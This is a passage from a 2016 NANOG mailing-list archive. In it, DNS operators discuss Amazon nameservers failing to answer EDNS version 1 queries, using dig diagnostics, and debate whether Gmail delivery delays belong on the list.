Do you even > > test for RFC compliance? > > > > Mark > > > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > > -- > > Mark Andrews, ISC > > 1 Seymour St., Dundas Valley, NSW 2117, Australia > > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > > > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From josh at kyneticwifi.com Fri Aug 26 23:54:32 2016 From: josh at kyneticwifi.com (Josh Reynolds) Date: Fri, 26 Aug 2016 18:54:32 -0500 Subject: Can someone from Amazon please answer. In-Reply-To: <20160826235310.4E9FD528F414@rock.dv.isc.org> References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> <20160826235310.4E9FD528F414@rock.dv.isc.org> Message-ID: Excellent info, thank you Mark. On Aug 26, 2016 6:53 PM, "Mark Andrews" wrote: > > In message mail.gmail.com>, Josh Reynolds writes: > > > > Just looking at the RFC... > > ----- > > VERSION Indicates the implementation level of the setter. Full > conformance > > with this specification is indicated by version '0'. 
Requestors are > > encouraged to set this to the lowest implemented level capable of > > expressing a transaction, to minimise the responder and network load of > > discovering the greatest common implementation level between requestor > and > > responder. A requestor's version numbering strategy MAY ideally be a > > run-time configuration option. If a responder does not implement the > > VERSION level of the request, then it MUST respond with RCODE=BADVERS. > All > > responses MUST be limited in format to the VERSION level of the request, > > but the VERSION of each response SHOULD be the highest implementation > level > > of the responder. In this way, a requestor will learn the implementation > > level of a responder as a side effect of every response, including error > > responses and including RCODE=BADVERS. > > ----- > > What am I missing, based on your output? > > The servers do not RESPOND to EDNS version != 0 queries. The following > sends a EDNS version 1 query and tells dig not to complete the EDNS version > negotiation so you can see the BADVERS response. > > % dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa > > ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 > +noednsneg soa > ;; global options: +cmd > ;; connection timed out; no servers could be reached > % > > A EDNS version 0 query to show reachability and that EDNS is supported. > > % dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa > > ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 > +noednsneg soa > ;; global options: +cmd > ;; Got answer: > ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 > ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 > ;; WARNING: recursion requested but not available > > ;; OPT PSEUDOSECTION: > ; EDNS: version: 0, flags:; udp: 4096 > ;; QUESTION SECTION: > ;lostoncampus.com.au. IN SOA > > ;; ANSWER SECTION: > lostoncampus.com.au. 900 IN SOA ns-1222.awsdns-24.org. 
> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 > > ;; AUTHORITY SECTION: > lostoncampus.com.au. 172800 IN NS ns-1222.awsdns-24.org. > lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk. > lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. > lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. > > ;; Query time: 126 msec > ;; SERVER: 205.251.195.156#53(205.251.195.156) > ;; WHEN: Sat Aug 27 09:40:29 EST 2016 > ;; MSG SIZE rcvd: 248 > > % > > What you should see is something like the following. Note the > version field is zero (0) and the rcode (status) field is BADVERS. > This response does show a protocol error: AD should not be set in > this response as there is no authenticated data. > > % dig . @a.root-servers.net +edns=1 +noednsneg soa > > ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa > ;; global options: +cmd > ;; Got answer: > ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 > ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 > ;; WARNING: recursion requested but not available > > ;; OPT PSEUDOSECTION: > ; EDNS: version: 0, flags:; udp: 1232 > ;; Query time: 438 msec > ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) > ;; WHEN: Sat Aug 27 09:34:32 EST 2016 > ;; MSG SIZE rcvd: 23 > > % > > Amazon are not alone here (about 20% of servers fail to respond to > EDNS version 1 queries) but they are big player so they should be > doing things correctly. See > https://ednscomp.isc.org/compliance/alexa-report.html for others > serving the Alexa top 1000 that get things wrong there are a lot > of you out there. There are also reports for the bottom 1000, .GOV, > .AU and the root zone at https://ednscomp.isc.org along with a > online compliance checker so others can test their servers. You > just need to name a zone and it will work out the rest or you can > target individual servers even those not listed in the NS RRset. 
> > There is also a whole series of graphs showing failure trends for > different EDNS compliance tests at > https://ednscomp.isc.org/compliance/summary.html > > Mark > > > On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > > > > > > > > I'm curious. What are you trying to achieve by blocking EDNS version > > > negotiation? Is it really too hard to return BADVERS to a EDNS > > > query with version != 0 along with the version of EDNS you support > > > in the version field? Are you deliberately trying to prevent the > > > IETF from deciding to bump the EDNS version in the future? Do you > > > have firewalls that have this behaviour hard coded? Do you even > > > test for RFC compliance? > > > > > > Mark > > > > > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > lostoncampus.com.au. 
@205.251.199.20 (ns-1812.awsdns-34.co.uk.): > dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > > > > -- > > > Mark Andrews, ISC > > > 1 Seymour St., Dundas Valley, NSW 2117, Australia > > > PHONE: +61 2 9871 4742 INTERNET: > marka at isc.org > > > > > > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > From jared at puck.nether.net Sat Aug 27 00:12:44 2016 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 26 Aug 2016 20:12:44 -0400 Subject: Can someone from Amazon please answer. In-Reply-To: References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> <20160826235310.4E9FD528F414@rock.dv.isc.org> Message-ID: My personal favorite broken domain is New York State Thruway folks. https://ednscomp.isc.org/ednscomp/cb652bc112 If you ask for AAAA of www.thruway.ny.gov it is a CNAME to www.wip.thruway.ny.gov and that breaks a number of DNS servers and load balancers, eg: $ host -t aaaa www.wip.thruway.ny.gov ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, expected 2001:558:feed::1#53 ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, expected 2001:558:feed::1#53 Waiting for the timeouts to occur or trying to get a robust response via TCP is problematic at best. DNS works really well despite much of the damage from firewall vendors and ill informed consultants. - Jared > On Aug 26, 2016, at 7:54 PM, Josh Reynolds wrote: > > Excellent info, thank you Mark. > > On Aug 26, 2016 6:53 PM, "Mark Andrews" wrote: > >> >> In message > mail.gmail.com>, Josh Reynolds writes: >>> >>> Just looking at the RFC... >>> ----- >>> VERSION Indicates the implementation level of the setter. Full >> conformance >>> with this specification is indicated by version '0'. 
Requestors are >>> encouraged to set this to the lowest implemented level capable of >>> expressing a transaction, to minimise the responder and network load of >>> discovering the greatest common implementation level between requestor >> and >>> responder. A requestor's version numbering strategy MAY ideally be a >>> run-time configuration option. If a responder does not implement the >>> VERSION level of the request, then it MUST respond with RCODE=BADVERS. >> All >>> responses MUST be limited in format to the VERSION level of the request, >>> but the VERSION of each response SHOULD be the highest implementation >> level >>> of the responder. In this way, a requestor will learn the implementation >>> level of a responder as a side effect of every response, including error >>> responses and including RCODE=BADVERS. >>> ----- >>> What am I missing, based on your output? >> >> The servers do not RESPOND to EDNS version != 0 queries. The following >> sends a EDNS version 1 query and tells dig not to complete the EDNS version >> negotiation so you can see the BADVERS response. >> >> % dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa >> >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 >> +noednsneg soa >> ;; global options: +cmd >> ;; connection timed out; no servers could be reached >> % >> >> A EDNS version 0 query to show reachability and that EDNS is supported. >> >> % dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa >> >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 >> +noednsneg soa >> ;; global options: +cmd >> ;; Got answer: >> ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 >> ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 >> ;; WARNING: recursion requested but not available >> >> ;; OPT PSEUDOSECTION: >> ; EDNS: version: 0, flags:; udp: 4096 >> ;; QUESTION SECTION: >> ;lostoncampus.com.au. IN SOA >> >> ;; ANSWER SECTION: >> lostoncampus.com.au. 
900 IN SOA ns-1222.awsdns-24.org. >> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 >> >> ;; AUTHORITY SECTION: >> lostoncampus.com.au. 172800 IN NS ns-1222.awsdns-24.org. >> lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk. >> lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. >> lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. >> >> ;; Query time: 126 msec >> ;; SERVER: 205.251.195.156#53(205.251.195.156) >> ;; WHEN: Sat Aug 27 09:40:29 EST 2016 >> ;; MSG SIZE rcvd: 248 >> >> % >> >> What you should see is something like the following. Note the >> version field is zero (0) and the rcode (status) field is BADVERS. >> This response does show a protocol error: AD should not be set in >> this response as there is no authenticated data. >> >> % dig . @a.root-servers.net +edns=1 +noednsneg soa >> >> ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa >> ;; global options: +cmd >> ;; Got answer: >> ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 >> ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 >> ;; WARNING: recursion requested but not available >> >> ;; OPT PSEUDOSECTION: >> ; EDNS: version: 0, flags:; udp: 1232 >> ;; Query time: 438 msec >> ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) >> ;; WHEN: Sat Aug 27 09:34:32 EST 2016 >> ;; MSG SIZE rcvd: 23 >> >> % >> >> Amazon are not alone here (about 20% of servers fail to respond to >> EDNS version 1 queries) but they are big player so they should be >> doing things correctly. See >> https://ednscomp.isc.org/compliance/alexa-report.html for others >> serving the Alexa top 1000 that get things wrong there are a lot >> of you out there. There are also reports for the bottom 1000, .GOV, >> .AU and the root zone at https://ednscomp.isc.org along with a >> online compliance checker so others can test their servers. 
You >> just need to name a zone and it will work out the rest or you can >> target individual servers even those not listed in the NS RRset. >> >> There is also a whole series of graphs showing failure trends for >> different EDNS compliance tests at >> https://ednscomp.isc.org/compliance/summary.html >> >> Mark >> >>> On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: >>> >>>> >>>> I'm curious. What are you trying to achieve by blocking EDNS version >>>> negotiation? Is it really too hard to return BADVERS to a EDNS >>>> query with version != 0 along with the version of EDNS you support >>>> in the version field? Are you deliberately trying to prevent the >>>> IETF from deciding to bump the EDNS version in the future? Do you >>>> have firewalls that have this behaviour hard coded? Do you even >>>> test for RFC compliance? >>>> >>>> Mark >>>> >>>> lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> lostoncampus.com.au. 
@205.251.199.20 (ns-1812.awsdns-34.co.uk.): >> dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> >>>> -- >>>> Mark Andrews, ISC >>>> 1 Seymour St., Dundas Valley, NSW 2117, Australia >>>> PHONE: +61 2 9871 4742 INTERNET: >> marka at isc.org >>>> >>> >> -- >> Mark Andrews, ISC >> 1 Seymour St., Dundas Valley, NSW 2117, Australia >> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org >> From johnl at iecc.com Sat Aug 27 01:25:42 2016 From: johnl at iecc.com (John Levine) Date: 27 Aug 2016 01:25:42 -0000 Subject: Why the internal network delays, Gmail? In-Reply-To: Message-ID: <20160827012542.43353.qmail@ary.lan> In article you write: >I was working within the limits of what I had available. Here's the subscription page for mailop. It's got about as odd a mix of people as nanog, ranging from people with single user linux machines to people who run some of the largest mail systems in the world, including Gmail: https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop R's, John From math at sizone.org Sat Aug 27 01:53:46 2016 From: math at sizone.org (Ken Chase) Date: Fri, 26 Aug 2016 21:53:46 -0400 Subject: Why the internal network delays, Gmail? In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: <20160827015346.GA32024@sizone.org> Im thankful Nate posted. Gmail isnt a small system that affects only a small percentage of people worldwide, and therefore a perfect candidate for a mail- specific list that many (and many nanoggers like me) arent part of, for lack of additional bandwidth in life. However, gmail not working (similar to 8.8.8.8/.4.4 or 4.2.2.2 not working) shouldnt be on a mail-only or dns-only ops list im not part of: when 8.8.8.8 doesnt work, the complaints appear as "is there a power failure at your datacentre?" 
to "my website is down!" - same deal with gmail, it's that big. While I cant say exactly what that cutoff line is for mail and dns issues being postable to nanog or not, I definitely know gmail is pretty much the top of the pile (for now). Thanks Nate! /kc On Fri, Aug 26, 2016 at 05:31:59PM -0600, Nate Metheny said: >I was working within the limits of what I had available. > >I apologize if people on the list consider a network and systems >administrator reaching out to peers for assistance with a particular >problem that is clearly network related is inappropriate for a network >operations group list that may or may not have Google or Google affiliated >employees or contractors on it. > >I will use more discretion in the future. > >-- >Sent from a phone. Please excuse the brevity of this message and any >typographical errors. > >On Aug 26, 2016 17:18, "Mark Foster" wrote: > >> Hi Mel, There's another mailing list called 'mailop' which is probably >> more appropriate for email related problems, than NANOG. >> >> And in response to Nate: >> >> I was in contact with Google and after some convincing and detailed header >>> information, they acknowledged that they are having internal MX issues and >>> assure me that they will deal with the issue promptly. >>> >>> Initially they did not even acknowledge that there was a problem, so it >>> took several tiers of support people to finally see the issue. >>> >>> I look forward to the ongoing exchanges on the list. >>> >> >> Useful to know, but John is right - as cited, working through Google's >> support process, got somewhere. >> Further exchanges on NANOG are probably inappropriate. A group like >> 'mailop' probably has a higher care factor, however. 
>>
>> (I would also note that email delays that are demonstratably outside of
>> your network (as headers will show) are very easily painted as something
>> beyond your control, and the nature of email is very much 'best effort', so
>> anyone playing the blame game needs a reality check. Just because email
>> exchanges 'are often' near-instantaneous, does not mean they always will
>> be.)
>>
>>
>> Mark.
>>
>>
>>
>> On 27/08/2016 8:53 a.m., Mel Beckman wrote:
>>
>>> John,
>>>
>>> With all due respect, it's S.O.P. for Nanogen to ask the list if anyone
>>> else is experiencing a particular problem with some carrier or another. So
>>> Nate's question is totally appropriate for this list. I know I've solved
>>> several problems by airing them here and getting insight from other list
>>> members.
>>>
>>> -mel beckman
>>>
>>> *snip*
>>

--
Ken Chase - math at sizone.org Toronto Canada

From marka at isc.org Sat Aug 27 02:36:36 2016
From: marka at isc.org (Mark Andrews)
Date: Sat, 27 Aug 2016 12:36:36 +1000
Subject: Can someone from Amazon please answer.
In-Reply-To: Your message of "Fri, 26 Aug 2016 20:12:44 -0400."
References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> <20160826235310.4E9FD528F414@rock.dv.isc.org>
Message-ID: <20160827023636.05DDA5294030@rock.dv.isc.org>

In message , Jared Mauch writes:
> My personal favorite broken domain is New York State Thruway folks.
>
> https://ednscomp.isc.org/ednscomp/cb652bc112
>
> If you ask for AAAA of www.thruway.ny.gov it is a CNAME to www.wip.thruway.ny.gov and that
> breaks a number of DNS servers and load balancers, eg:
>
> $ host -t aaaa www.wip.thruway.ny.gov
> ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, expected 2001:558:feed::1#53
> ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, expected 2001:558:feed::1#53
>
> Waiting for the timeouts to occur or trying to get a robust response via TCP is problematic at best.
> > DNS works really well despite much of the damage from firewall vendors and ill informed consultants. > > - Jared Your tax payer dollars at work. If you are a resident of NY state go complain to your state representatives. Which bureaucrat signed off on the purchase of this piece of garbage. Load balancers need to answer all query types. % dig www.wip.thruway.ny.gov @lc1.thruway.ny.gov ; <<>> DiG 9.11.0rc1 <<>> www.wip.thruway.ny.gov @lc1.thruway.ny.gov ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59670 ;; flags: qr aa rd ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;www.wip.thruway.ny.gov. IN A ;; ANSWER SECTION: www.wip.thruway.ny.gov. 30 IN A 66.192.38.208 ;; Query time: 394 msec ;; SERVER: 161.11.122.60#53(161.11.122.60) ;; WHEN: Sat Aug 27 12:28:56 EST 2016 ;; MSG SIZE rcvd: 56 % dig www.wip.thruway.ny.gov @lc1.thruway.ny.gov aaaa ; <<>> DiG 9.11.0rc1 <<>> www.wip.thruway.ny.gov @lc1.thruway.ny.gov aaaa ;; global options: +cmd ;; connection timed out; no servers could be reached % > > > On Aug 26, 2016, at 7:54 PM, Josh Reynolds wrote: > > > > Excellent info, thank you Mark. > > > > On Aug 26, 2016 6:53 PM, "Mark Andrews" wrote: > > > >> > >> In message >> mail.gmail.com>, Josh Reynolds writes: > >>> > >>> Just looking at the RFC... > >>> ----- > >>> VERSION Indicates the implementation level of the setter. Full > >> conformance > >>> with this specification is indicated by version '0'. Requestors are > >>> encouraged to set this to the lowest implemented level capable of > >>> expressing a transaction, to minimise the responder and network load of > >>> discovering the greatest common implementation level between requestor > >> and > >>> responder. A requestor's version numbering strategy MAY ideally be a > >>> run-time configuration option.
If a responder does not implement the > >>> VERSION level of the request, then it MUST respond with RCODE=BADVERS. > >> All > >>> responses MUST be limited in format to the VERSION level of the request, > >>> but the VERSION of each response SHOULD be the highest implementation > >> level > >>> of the responder. In this way, a requestor will learn the implementation > >>> level of a responder as a side effect of every response, including error > >>> responses and including RCODE=BADVERS. > >>> ----- > >>> What am I missing, based on your output? > >> > >> The servers do not RESPOND to EDNS version != 0 queries. The following > >> sends a EDNS version 1 query and tells dig not to complete the EDNS version > >> negotiation so you can see the BADVERS response. > >> > >> % dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa > >> > >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 > >> +noednsneg soa > >> ;; global options: +cmd > >> ;; connection timed out; no servers could be reached > >> % > >> > >> A EDNS version 0 query to show reachability and that EDNS is supported. > >> > >> % dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa > >> > >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 > >> +noednsneg soa > >> ;; global options: +cmd > >> ;; Got answer: > >> ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 > >> ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 > >> ;; WARNING: recursion requested but not available > >> > >> ;; OPT PSEUDOSECTION: > >> ; EDNS: version: 0, flags:; udp: 4096 > >> ;; QUESTION SECTION: > >> ;lostoncampus.com.au. IN SOA > >> > >> ;; ANSWER SECTION: > >> lostoncampus.com.au. 900 IN SOA ns-1222.awsdns-24.org. > >> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 > >> > >> ;; AUTHORITY SECTION: > >> lostoncampus.com.au.
172800 IN NS ns-1222.awsdns-24.org. > >> lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk. > >> lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. > >> lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. > >> > >> ;; Query time: 126 msec > >> ;; SERVER: 205.251.195.156#53(205.251.195.156) > >> ;; WHEN: Sat Aug 27 09:40:29 EST 2016 > >> ;; MSG SIZE rcvd: 248 > >> > >> % > >> > >> What you should see is something like the following. Note the > >> version field is zero (0) and the rcode (status) field is BADVERS. > >> This response does show a protocol error: AD should not be set in > >> this response as there is no authenticated data. > >> > >> % dig . @a.root-servers.net +edns=1 +noednsneg soa > >> > >> ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa > >> ;; global options: +cmd > >> ;; Got answer: > >> ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 > >> ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 > >> ;; WARNING: recursion requested but not available > >> > >> ;; OPT PSEUDOSECTION: > >> ; EDNS: version: 0, flags:; udp: 1232 > >> ;; Query time: 438 msec > >> ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) > >> ;; WHEN: Sat Aug 27 09:34:32 EST 2016 > >> ;; MSG SIZE rcvd: 23 > >> > >> % > >> > >> Amazon are not alone here (about 20% of servers fail to respond to > >> EDNS version 1 queries) but they are big player so they should be > >> doing things correctly. See > >> https://ednscomp.isc.org/compliance/alexa-report.html for others > >> serving the Alexa top 1000 that get things wrong there are a lot > >> of you out there. There are also reports for the bottom 1000, .GOV, > >> .AU and the root zone at https://ednscomp.isc.org along with a > >> online compliance checker so others can test their servers. You > >> just need to name a zone and it will work out the rest or you can > >> target individual servers even those not listed in the NS RRset.
> >> > >> There is also a whole series of graphs showing failure trends for > >> different EDNS compliance tests at > >> https://ednscomp.isc.org/compliance/summary.html > >> > >> Mark > >> > >>> On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > >>> > >>>> > >>>> I'm curious. What are you trying to achieve by blocking EDNS version > >>>> negotiation? Is it really too hard to return BADVERS to a EDNS > >>>> query with version != 0 along with the version of EDNS you support > >>>> in the version field? Are you deliberately trying to prevent the > >>>> IETF from deciding to bump the EDNS version in the future? Do you > >>>> have firewalls that have this behaviour hard coded? Do you even > >>>> test for RFC compliance? > >>>> > >>>> Mark > >>>> > >>>> lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > >>>> edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok > >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > >>>> lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > >>>> edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok > >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > >>>> lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > >>>> edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok > >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > >>>> lostoncampus.com.au.
@205.251.199.20 (ns-1812.awsdns-34.co.uk.): > >> dns=ok > >>>> edns=ok edns1=timeout edns@512=ok ednsopt=ok edns1opt=timeout do=ok > >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > >>>> > >>>> -- > >>>> Mark Andrews, ISC > >>>> 1 Seymour St., Dundas Valley, NSW 2117, Australia > >>>> PHONE: +61 2 9871 4742 INTERNET: > >> marka at isc.org > >>>> > >>> > >> -- > >> Mark Andrews, ISC > >> 1 Seymour St., Dundas Valley, NSW 2117, Australia > >> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > >> > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mel at beckman.org Sat Aug 27 10:34:36 2016 From: mel at beckman.org (Mel Beckman) Date: Sat, 27 Aug 2016 10:34:36 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160827012542.43353.qmail@ary.lan> References: , <20160827012542.43353.qmail@ary.lan> Message-ID: <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> John, But mailop doesn't have the same odd mix of people as nanog. For example, I'm not on mailop. :) In any event, Nate specifically asked if other nanogers were seeing similar symptoms, which is an entirely appropriate use of this list. -mel On Aug 26, 2016, at 9:26 PM, John Levine > wrote: In article > you write: I was working within the limits of what I had available. Here's the subscription page for mailop. It's got about as odd a mix of people as nanog, ranging from people with single user linux machines to people who run some of the largest mail systems in the world, including Gmail: https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop R's, John From johnl at iecc.com Sat Aug 27 15:46:35 2016 From: johnl at iecc.com (John Levine) Date: 27 Aug 2016 15:46:35 -0000 Subject: Can someone from Amazon please answer.
In-Reply-To: <20160827023636.05DDA5294030@rock.dv.isc.org> Message-ID: <20160827154635.45594.qmail@ary.lan> >> If you ask for AAAA of www.thruway.ny.gov it is a CNAME to www.wip.thruway.ny.gov and that >> breaks a number of DNS servers and load balancers, eg: >Your tax payer dollars at work. Naah. The Thruway is supported by user fees, no taxes involved. I will agree they have a couple of pretty braindead nameservers, though. R's, John From A.L.M.Buxey at lboro.ac.uk Sat Aug 27 17:13:45 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Sat, 27 Aug 2016 17:13:45 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: <20160827171345.GA9725@lboro.ac.uk> Hi, > administrator reaching out to peers for assistance with a particular > problem that is clearly network related is inappropriate for a network clearly network related? people have an interesting expectation of email - expecting instant delivery. you might check their level of expectation....the SLA etc define service availability but email delivery is pretty much 'best efforts of all parties involved in the transaction' - ideally it gets there quickly...but it could take up to 72 hours. google have several status dashboards that you can check/monitor. generally, if you have an issue with a particular service on the internet, contact them directly. don't use a 3rd party mail list - they *might* be around on it but it's not their official service desk contact point ;-) alan From A.L.M.Buxey at lboro.ac.uk Sat Aug 27 17:16:57 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Sat, 27 Aug 2016 17:16:57 +0000 Subject: Why the internal network delays, Gmail?
In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: <20160827171657.GB9725@lboro.ac.uk> Hi, > I was working within the limits of what I had available. Google offer several trouble shooting tools for their service too, you might want to look at their toolbox eg https://toolbox.googleapps.com/apps/messageheader/ (part of their 'why is my email slow to deliver?' process) alan From Valdis.Kletnieks at vt.edu Sat Aug 27 18:24:23 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sat, 27 Aug 2016 14:24:23 -0400 Subject: Why the internal network delays, Gmail? In-Reply-To: <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> References: , <20160827012542.43353.qmail@ary.lan> <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> Message-ID: <77625.1472322263@turing-police.cc.vt.edu> On Sat, 27 Aug 2016 10:34:36 -0000, Mel Beckman said: > But mailop doesn't have the same odd mix of people as nanog. For example, I'm > not 